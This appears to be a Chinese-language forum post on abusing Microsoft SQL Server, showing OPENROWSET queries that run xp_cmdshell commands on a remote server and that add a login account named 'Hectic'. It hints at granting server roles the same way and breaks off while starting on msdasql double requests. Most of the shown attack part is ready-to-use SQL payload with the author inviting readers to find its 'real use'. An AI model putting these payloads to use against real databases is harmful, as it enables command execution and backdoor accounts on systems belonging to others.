sqlserver新漏洞和一些突破口

　　下面我要谈到一些sqlserver新的bug，虽然本人经过长时间的努力，当然也有点幸运的成分在内,才得以发现，不敢一个人独享，拿出来请大家鉴别,当然很有可能有些高手早已知道了，毕竟我接触sqlserver的时间不到1年：P 

　　1．关于openrowset和opendatasource 

　　可能这个技巧早有人已经会了，就是利用openrowset发送本地命令。通常我们的用法是（包括MSDN的列子）如下： 

select * from openrowset('sqloledb','myserver';'sa';'','select * from table') 

　　可见（即使从字面意义上看)openrowset只是作为一个快捷的远程数据库访问，它必须跟在select后面，也就是说需要返回一个recordset 。

　　那么我们能不能利用它调用xp_cmdshell呢？答案是肯定的！ 

select * from openrowset('sqloledb','server';'sa';'','set fmtonly off exec master.dbo.xp_cmdshel l ''dir c:\''') 

必须加上set fmtonly off用来屏蔽默认的只返回列信息的设置，这样xp_cmdshell返回的output集合就会提交给前面的select显示，如果采用默认设置，会返回空集合导致select出错，命令也就无法执行了。 

　　那么如果我们要调用sp_addlogin呢，他不会像xp_cmdshell返回任何集合的，我们就不能再依靠fmtonly设置了，可以如下操作 

select * from openrowset('sqloledb','server';'sa';'','select ''OK!'' exec master.dbo.sp_addlogin Hectic') 

　　这样，命令至少会返回select 'OK!'的集合，你的机器商会显示OK!，同时对方的数据库内也会增加一个Hectic的账号，也就是说，我们利用select 'OK!'的返回集合欺骗了本地的select请求，是命令能够正常执行，通理sp_addsrvrolemember和opendatasource也可以如此操作！至于这个方法真正的用处，大家慢慢想吧：P 

　　2．关于msdasql两次请求的问题 

　　不知道大家有没有试过用msdasql连接远程数据库，当然这个api必须是sqlserver的管理员才可以调用，那么如下 

select * from openrowset('msdasql','driver={sql server};server=server;address=server,1433;uid=sa;pwd=;database=master;network=dbmssocn','select * from table1 select * from  table2')